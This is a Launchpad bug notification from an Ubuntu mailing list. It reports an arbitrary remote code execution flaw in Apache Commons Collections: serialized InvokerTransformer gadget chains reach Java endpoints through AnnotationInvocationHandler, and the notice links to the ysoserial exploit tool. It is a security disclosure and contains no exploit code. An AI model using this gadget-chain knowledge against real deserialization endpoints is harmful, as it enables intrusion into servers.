[Bug 1514985] [NEW] Arbitrary remote code execution with InvokerTransformer
Steve Beattie
sbeattie at ubuntu.com
Tue Nov 10 19:52:54 UTC 2015
*** This bug is a security vulnerability ***
Public security bug reported:
Upstream bug report:
https://issues.apache.org/jira/browse/COLLECTIONS-580
With InvokerTransformer serializable collections can be build that
execute arbitrary Java code.
sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
#entrySet and #get on a deserialized collection. If you have an endpoint
that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
combine the two to create arbitrary remote code execution vulnerability.
https://github.com/frohoff/ysoserial
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-
jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
[No CVE has been assigned for this yet]
** Affects: libcommons-collections3-java (Ubuntu)
Importance: Undecided
Status: New
** Affects: libcommons-collections4-java (Ubuntu)
Importance: Undecided
Status: New
** Description changed:
With InvokerTransformer serializable collections can be build that
execute arbitrary Java code.
sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
#entrySet and #get on a deserialized collection. If you have an endpoint
that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
combine the two to create arbitrary remote code execution vulnerability.
- I don't know of a good fix short of removing InvokerTransformer or
- making it not Serializable. Both probably break existing applications.
-
- This is not my research, but has been discovered by other people.
-
https://github.com/frohoff/ysoserial
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-
jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
[No CVE has been assigned for this yet]
** Also affects: libcommons-collections4-java (Ubuntu)
Importance: Undecided
Status: New
** Description changed:
+ Upstream bug report:
+ https://issues.apache.org/jira/browse/COLLECTIONS-580
+
With InvokerTransformer serializable collections can be build that
execute arbitrary Java code.
sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
#entrySet and #get on a deserialized collection. If you have an endpoint
that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
combine the two to create arbitrary remote code execution vulnerability.
https://github.com/frohoff/ysoserial
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-
jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
[No CVE has been assigned for this yet]
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to libcommons-collections3-java in
Ubuntu.
https://bugs.launchpad.net/bugs/1514985
Title:
Arbitrary remote code execution with InvokerTransformer
Status in libcommons-collections3-java package in Ubuntu:
New
Status in libcommons-collections4-java package in Ubuntu:
New
Bug description:
Upstream bug report:
https://issues.apache.org/jira/browse/COLLECTIONS-580
With InvokerTransformer serializable collections can be build that
execute arbitrary Java code.
sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
#entrySet and #get on a deserialized collection. If you have an
endpoint that accepts serialized Java objects (JMX, RMI, remote EJB,
...) you can combine the two to create arbitrary remote code execution
vulnerability.
https://github.com/frohoff/ysoserial
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-
jboss-jenkins-opennms-and-your-application-have-in-common-this-
vulnerability/
[No CVE has been assigned for this yet]
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcommons-collections3-java/+bug/1514985/+subscriptions
More information about the foundations-bugs
mailing list